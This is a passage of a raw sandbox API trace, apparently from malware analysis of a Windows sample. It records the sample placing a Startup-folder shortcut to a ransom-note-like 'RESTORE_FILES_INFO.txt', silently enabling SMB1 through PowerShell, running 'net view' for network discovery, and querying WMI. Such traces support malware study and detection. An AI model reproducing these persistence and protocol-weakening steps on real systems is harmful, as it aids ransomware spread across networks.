ppvObject=0x26c9c8*=0x73fdc4) returned 0x0 [0095.913] WbemLocator:IRpcOptions:Query (in: This=0x73fdc4, pPrx=0x73fddc, dwProperty=2, pdwValue=0x26c9f0 | out: pdwValue=0x26c9f0) returned 0x0 [0095.913] WbemLocator:IUnknown:Release (This=0x73fdc4) returned 0x3 [0095.913] WbemLocator:IUnknown:Release (This=0x73fddc) returned 0x2 [0095.913] WbemLocator:IUnknown:Release (This=0x73fddc) returned 0x1 [0095.939] CoGetContextToken (in: pToken=0x26e510 | out: pToken=0x26e510) returned 0x0 [0095.939] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74a894a0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e584 | out: ppvObject=0x26e584*=0x764844) returned 0x0 [0096.287] WbemLocator:IUnknown:QueryInterface (in: This=0x764844, riid=0x74b50474*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26e720 | out: ppvObject=0x26e720*=0x0) returned 0x80004002 [0097.143] WbemLocator:IDispatch:GetIDsOfNames (in: This=0x764844, riid=0x74a98fac*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26e580*="CreateShortcut", cNames=0x1, lcid=0x409, rgDispId=0x26e570 | out: rgDispId=0x26e570*=1002) returned 0x0 [0098.098] WbemLocator:IDispatch:Invoke (in: This=0x764844, dispIdMember=1002, riid=0x74a98fac*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26e708*(rgvarg=([0]=0x26e590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mystartup.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x26e698, pExcepInfo=0x26e46c, puArgErr=0x26e4a0 | out: pDispParams=0x26e708*(rgvarg=([0]=0x26e590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mystartup.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x26e698*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x764a84, varVal2=0x0), pExcepInfo=0x26e46c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26e4a0*=0x0) returned 0x0 [0100.057] WbemLocator:IUnknown:QueryInterface (in: This=0x764a84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfbc | out: ppvObject=0x26dfbc*=0x73fecc) returned 0x0 [0100.058] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df78 | out: ppvObject=0x26df78*=0x0) returned 0x80004002 [0100.154] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dd94 | out: ppvObject=0x26dd94*=0x764b14) returned 0x0 [0100.220] WbemLocator:IProvideClassInfo:GetClassInfo (in: This=0x764b14, ppTI=0x26dd9c | out: ppTI=0x26dd9c*=0x764ba4) returned 0x0 [0100.470] ITypeInfo:RemoteGetTypeAttr (in: This=0x764ba4, ppTypeAttr=0x26dd90, pDummy=0xf8cdf1e1 | out: ppTypeAttr=0x26dd90, pDummy=0xf8cdf1e1) returned 0x0 [0101.787] ITypeInfo:LocalReleaseTypeAttr (This=0x764ba4) returned 0xc50001 [0101.787] WbemLocator:IUnknown:Release (This=0x764b14) returned 0x2 [0101.787] WbemLocator:IUnknown:Release (This=0x764ba4) returned 0x0 [0102.114] WbemLocator:IUnknown:AddRef (This=0x73fecc) returned 0x3 [0102.114] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8d4 | out: ppvObject=0x26d8d4*=0x0) returned 0x80004002 [0103.675] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d884 | out: ppvObject=0x26d884*=0x0) returned 0x80004002 [0104.369] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d890 | out: ppvObject=0x26d890*=0x73fe2c) returned 0x0 [0104.370] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x73fe2c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d898 | out: pCid=0x26d898*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0104.370] WbemLocator:IUnknown:Release (This=0x73fe2c) returned 0x3 [0104.370] CoGetContextToken (in: pToken=0x26d8f0 | out: pToken=0x26d8f0) returned 0x0 [0104.370] CoGetContextToken (in: pToken=0x26dcf8 | out: pToken=0x26dcf8) returned 0x0 [0104.370] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd88 | out: ppvObject=0x26dd88*=0x73feb4) returned 0x0 [0104.370] WbemLocator:IRpcOptions:Query (in: This=0x73feb4, pPrx=0x73fecc, dwProperty=2, pdwValue=0x26ddb0 | out: pdwValue=0x26ddb0) returned 0x80004002 [0104.370] WbemLocator:IUnknown:Release (This=0x73feb4) returned 0x3 [0104.370] WbemLocator:IUnknown:Release (This=0x73fecc) returned 0x2 [0104.395] WbemLocator:IUnknown:Release (This=0x764844) returned 0x1 [0104.395] CoGetContextToken (in: pToken=0x26e800 | out: pToken=0x26e800) returned 0x0 [0104.395] IIDFromString (in: lpsz="{F935DC23-1CF0-11D0-ADB9-00C04FD58A0B}", lpiid=0x26e830 | out: lpiid=0x26e830) returned 0x0 [0104.396] CoGetContextToken (in: pToken=0x26e760 | out: pToken=0x26e760) returned 0x0 [0104.396] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x26e830*(Data1=0xf935dc23, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), ppvObject=0x26e82c | out: ppvObject=0x26e82c*=0x764c7c) returned 0x0 [0105.355] WbemLocator:IUnknown:AddRef (This=0x764c7c) returned 0x3 [0105.355] WbemLocator:IUnknown:Release (This=0x764c7c) returned 0x2 [0105.379] WbemLocator:IWshShortcut:put_Description (This=0x764c7c, Description="Installer...") returned 0x0 [0107.592] WbemLocator:IWshShortcut:put_Hotkey (This=0x764c7c, Hotkey="Ctrl+Shift+X") returned 0x0 [0108.484] WbemLocator:IWshShortcut:put_TargetPath (This=0x764c7c, TargetPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\\\RESTORE_FILES_INFO.txt") returned 0x0 [0113.555] WbemLocator:IWshShortcut:put_WorkingDirectory (This=0x764c7c, WorkingDirectory=0x0) returned 0x0 [0114.816] WbemLocator:IWshShortcut:put_Arguments (This=0x764c7c, Arguments=0x0) returned 0x0 [0115.264] WbemLocator:IWshShortcut:Save (This=0x764c7c) returned 0x0 [0133.876] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0133.876] CreatePipe (in: hReadPipe=0x26e6f4, hWritePipe=0x26e6f0, lpPipeAttributes=0x26e674, nSize=0x0 | out: hReadPipe=0x26e6f4*=0x444, hWritePipe=0x26e6f0*=0x520) returned 1 [0133.876] GetCurrentProcess () returned 0xffffffff [0133.876] GetCurrentProcess () returned 0xffffffff [0133.876] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e6f8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e6f8*=0x478) returned 1 [0133.877] CloseHandle (hObject=0x444) returned 1 [0133.877] CreatePipe (in: hReadPipe=0x26e6f4, hWritePipe=0x26e6f0, lpPipeAttributes=0x26e674, nSize=0x0 | out: hReadPipe=0x26e6f4*=0x444, hWritePipe=0x26e6f0*=0x448) returned 1 [0133.877] GetCurrentProcess () returned 0xffffffff [0133.877] GetCurrentProcess () returned 0xffffffff [0133.877] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e6f8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e6f8*=0x464) returned 1 [0133.877] CloseHandle (hObject=0x444) returned 1 [0133.877] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0133.877] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0133.877] CoTaskMemFree (pv=0x741d20) [0133.877] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"powershell.exe\" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e5d8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x520, hStdError=0x448), lpProcessInformation=0x2274f54 | out: lpCommandLine="\"powershell.exe\" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol", lpProcessInformation=0x2274f54*(hProcess=0x3f0, hThread=0x444, dwProcessId=0xe8c, dwThreadId=0xf44)) returned 1 [0133.939] CloseHandle (hObject=0x520) returned 1 [0133.939] CloseHandle (hObject=0x448) returned 1 [0133.939] GetFileType (hFile=0x478) returned 0x3 [0133.940] GetFileType (hFile=0x464) returned 0x3 [0133.940] CloseHandle (hObject=0x444) returned 1 [0135.653] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0135.654] CreatePipe (in: hReadPipe=0x26e6d0, hWritePipe=0x26e6cc, lpPipeAttributes=0x26e650, nSize=0x0 | out: hReadPipe=0x26e6d0*=0x448, hWritePipe=0x26e6cc*=0x504) returned 1 [0135.654] GetCurrentProcess () returned 0xffffffff [0135.654] GetCurrentProcess () returned 0xffffffff [0135.654] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e6d4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e6d4*=0x530) returned 1 [0135.654] CloseHandle (hObject=0x448) returned 1 [0135.654] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0135.654] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0135.654] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0135.654] CoTaskMemFree (pv=0x741d20) [0135.654] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c net view", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e618*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x279c0fc | out: lpCommandLine="\"cmd.exe\" /c net view", lpProcessInformation=0x279c0fc*(hProcess=0x528, hThread=0x448, dwProcessId=0xcac, dwThreadId=0x1318)) returned 1 [0135.873] CloseHandle (hObject=0x504) returned 1 [0135.874] GetFileType (hFile=0x530) returned 0x3 [0135.874] CloseHandle (hObject=0x448) returned 1 [0135.874] ReadFile (in: hFile=0x530, lpBuffer=0x27ce208, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e78c, lpOverlapped=0x0 | out: lpBuffer=0x27ce208, lpNumberOfBytesRead=0x26e78c*=0x0, lpOverlapped=0x0) returned 0 [0181.630] GetCurrentProcess () returned 0xffffffff [0181.630] GetCurrentProcess () returned 0xffffffff [0181.630] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x528, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e770, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e770*=0x260) returned 1 [0181.631] CloseHandle (hObject=0x260) returned 1 [0181.631] CloseHandle (hObject=0x528) returned 1 [0181.631] GetComputerNameW (in: lpBuffer=0x26e5c0, nSize=0x26e838 | out: lpBuffer="XDUWTFONO", nSize=0x26e838) returned 1 [0182.444] NetDfsEnum () returned 0x6ba [0182.696] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e834 | out: puCount=0x26e834*=0x2) returned 0x0 [0182.696] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e830*=0x0, pszText=0x0 | out: puBuffLength=0x26e830*=0xf, pszText=0x0) returned 0x0 [0182.697] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e830*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e830*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0182.697] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7c0 | out: ppv=0x26e7c0*=0x6ded34) returned 0x0 [0182.698] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7b8 | out: pAptType=0x26e7b8*=1) returned 0x0 [0182.698] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7bc | out: ppvObject=0x26e7bc*=0x0) returned 0x80004002 [0182.698] IUnknown:Release (This=0x6ded34) returned 0x1 [0182.699] CoGetClassObject (in: rclsid=0x700854*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e3e0 | out: ppv=0x26e3e0*=0x5226fc8) returned 0x0 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5226fc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e5f8 | out: ppvObject=0x26e5f8*=0x0) returned 0x80004002 [0182.700] WbemLocator:IClassFactory:CreateInstance (in: This=0x5226fc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e60c | out: ppvObject=0x26e60c*=0x5210a10) returned 0x0 [0182.700] WbemLocator:IUnknown:Release (This=0x5226fc8) returned 0x0 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e22c | out: ppvObject=0x26e22c*=0x5210a10) returned 0x0 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e1e8 | out: ppvObject=0x26e1e8*=0x0) returned 0x80004002 [0182.700] WbemLocator:IUnknown:AddRef (This=0x5210a10) returned 0x3 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26db44 | out: ppvObject=0x26db44*=0x0) returned 0x80004002 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26daf4 | out: ppvObject=0x26daf4*=0x0) returned 0x80004002 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26db00 | out: ppvObject=0x26db00*=0x0) returned 0x80004002 [0182.700] CoGetContextToken (in: pToken=0x26db60 | out: pToken=0x26db60) returned 0x0 [0182.700] CoGetContextToken (in: pToken=0x26df68 | out: pToken=0x26df68) returned 0x0 [0182.700] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dff8 | out: ppvObject=0x26dff8*=0x0) returned 0x80004002 [0182.701] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x2 [0182.701] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x1 [0182.701] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0182.701] CoGetContextToken (in: pToken=0x26e538 | out: pToken=0x26e538) returned 0x0 [0182.701] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x26e608*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e604 | out: ppvObject=0x26e604*=0x5210a10) returned 0x0 [0182.701] WbemLocator:IUnknown:AddRef (This=0x5210a10) returned 0x3 [0182.701] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x2 [0182.701] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e79c | out: puCount=0x26e79c*=0x2) returned 0x0 [0182.701] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=8, puBuffLength=0x26e798*=0x0, pszText=0x0 | out: puBuffLength=0x26e798*=0xf, pszText=0x0) returned 0x0 [0182.701] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=8, puBuffLength=0x26e798*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e798*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0182.701] CoCreateInstance (in: rclsid=0x75241284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x752412e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x26e674 | out: ppv=0x26e674*=0x5210a20) returned 0x0 [0182.702] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5210a20, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x26e708 | out: ppNamespace=0x26e708*=0x521cbdc) returned 0x0 [0192.642] WbemLocator:IUnknown:QueryInterface (in: This=0x521cbdc, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5a4 | out: ppvObject=0x26e5a4*=0x73ff9c) returned 0x0 [0192.642] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x73ff9c, pProxy=0x521cbdc, pAuthnSvc=0x26e5f4, pAuthzSvc=0x26e5f0, pServerPrincName=0x26e5e8, pAuthnLevel=0x26e5ec, pImpLevel=0x26e5dc, pAuthInfo=0x26e5e0, pCapabilites=0x26e5e4 | out: pAuthnSvc=0x26e5f4*=0xa, pAuthzSvc=0x26e5f0*=0x0, pServerPrincName=0x26e5e8, pAuthnLevel=0x26e5ec*=0x6, pImpLevel=0x26e5dc*=0x2, pAuthInfo=0x26e5e0, pCapabilites=0x26e5e4*=0x1) returned 0x0 [0192.643] WbemLocator:IUnknown:Release (This=0x73ff9c) returned 0x1 [0192.643] WbemLocator:IUnknown:QueryInterface (in: This=0x521cbdc, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e598 | out: ppvObject=0x26e598*=0x73ffbc) returned 0x0 [0192.643] WbemLocator:IUnknown:QueryInterface (in: This=0x521cbdc, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e594 | out: ppvObject=0x26e594*=0x73ff9c) returned 0x0 [0192.643] WbemLocator:IClientSecurity:SetBlanket (This=0x73ff9c, pProxy=0x521cbdc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0192.643] WbemLocator:IUnknown:Release (This=0x73ff9c) returned 0x2 [0192.643] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x1 [0192.643] CoTaskMemFree (pv=0x700f08) [0192.643] WbemLocator:IUnknown:Release (This=0x5210a20) returned 0x0 [0192.643] WbemLocator:IUnknown:QueryInterface (in: This=0x521cbdc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e194 | out: ppvObject=0x26e194*=0x73ffbc) returned 0x0 [0192.644] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e150 | out: ppvObject=0x26e150*=0x0) returned 0x80004002 [0193.955] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26df6c | out: ppvObject=0x26df6c*=0x0) returned 0x80004002 [0194.565] WbemLocator:IUnknown:AddRef (This=0x73ffbc) returned 0x3 [0194.565] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26daac | out: ppvObject=0x26daac*=0x0) returned 0x80004002 [0194.615] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26da5c | out: ppvObject=0x26da5c*=0x0) returned 0x80004002 [0194.686] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26da68 | out: ppvObject=0x26da68*=0x73ff1c) returned 0x0 [0194.687] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x73ff1c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26da70 | out: pCid=0x26da70*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.687] WbemLocator:IUnknown:Release (This=0x73ff1c) returned 0x3 [0194.687] CoGetContextToken (in: pToken=0x26dac8 | out: pToken=0x26dac8) returned 0x0 [0194.687] CoGetContextToken (in: pToken=0x26ded0 | out: pToken=0x26ded0) returned 0x0 [0194.687] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, 